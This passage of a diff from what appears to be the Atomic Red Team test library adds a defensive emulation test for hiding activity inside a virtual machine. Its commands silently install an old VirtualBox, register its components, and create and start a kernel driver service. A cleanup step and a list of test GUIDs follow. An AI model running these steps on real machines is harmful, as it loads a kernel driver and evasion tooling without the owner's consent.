+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" 
+  - description: |
+      Old version of Virtualbox must be installed
+    prereq_command: |
+      if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll") {exit 0} else {exit 1}
+    get_prereq_command: |
+      msiexec /i #{msi_file_path} /qn
+  executor:
+    command: |
+      "C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
+      regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+      rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
+      sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
+      sc start VBoxDRV
+    cleanup_command: |
+      sc stop VBoxDRV
+      sc delete VBoxDRV
+      regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+      msiexec /x #{msi_file_path} /qn
+    name: command_prompt
+

atomics/used_guids.txt

@@ -851,3 +851,35 @@ deecd55f-afe0-4a62-9fba-4d1ba2deb321
 d239772b-88e2-4a2e-8473-897503401bcc
 eb8da98a-2e16-4551-b3dd-83de49baa14c
 ef0581fd-528e-4662-87bc-4c2affb86940
+0e65ae27-5385-46b4-98ac-607a8ee82261
+92c40b3f-c406-4d1f-8d2b-c039bf5009e4
+1a94b3fc-b080-450a-b3d8-6d9b57b472ea
+c8f4bc29-a151-48da-b3be-4680af56f404
+a6a5ec26-a2d1-4109-9d35-58b867689329
+3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
+a0bced08-3fc5-4d8b-93b7-e8344739376e
+ae3a8605-b26e-457c-b6b3-2702fd335bac
+4449c89b-ec82-43a4-89c1-91e2f1abeecc
+48117158-d7be-441b-bc6a-d9e36e47b52b
+178136d8-2778-4d7a-81f3-d517053a4fd6
+d0c81167-803d-4dca-99b4-7ce65e7b257c
+46274fc6-08a7-4956-861b-24cbbaa0503c
+a2b35a63-9df1-4806-9a4d-5fe0500845f2
+962a6017-1c09-45a6-880b-adc9c57cb22e
+9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+e4c04b6f-c492-4782-82c7-3bf75eb8077e
+c59f246a-34f8-4e4d-9276-c295ef9ba0dd
+14d55ca0-920e-4b44-8425-37eedd72b173
+7b9d85e5-c4ce-4434-8060-d3de83595e69
+0e1483ba-8f0c-425d-b8c6-42736e058eaa
+7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
+6581e4a7-42e3-43c5-a0d2-5a0d62f9702a
+5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
+4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+12631354-fdbc-4164-92be-402527e748da
+5fc528dd-79de-47f5-8188-25572b7fafe0
+e895677d-4f06-49ab-91b6-ae3742d0a2ba
+35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+0b79c06f-c788-44a2-8630-d69051f1123d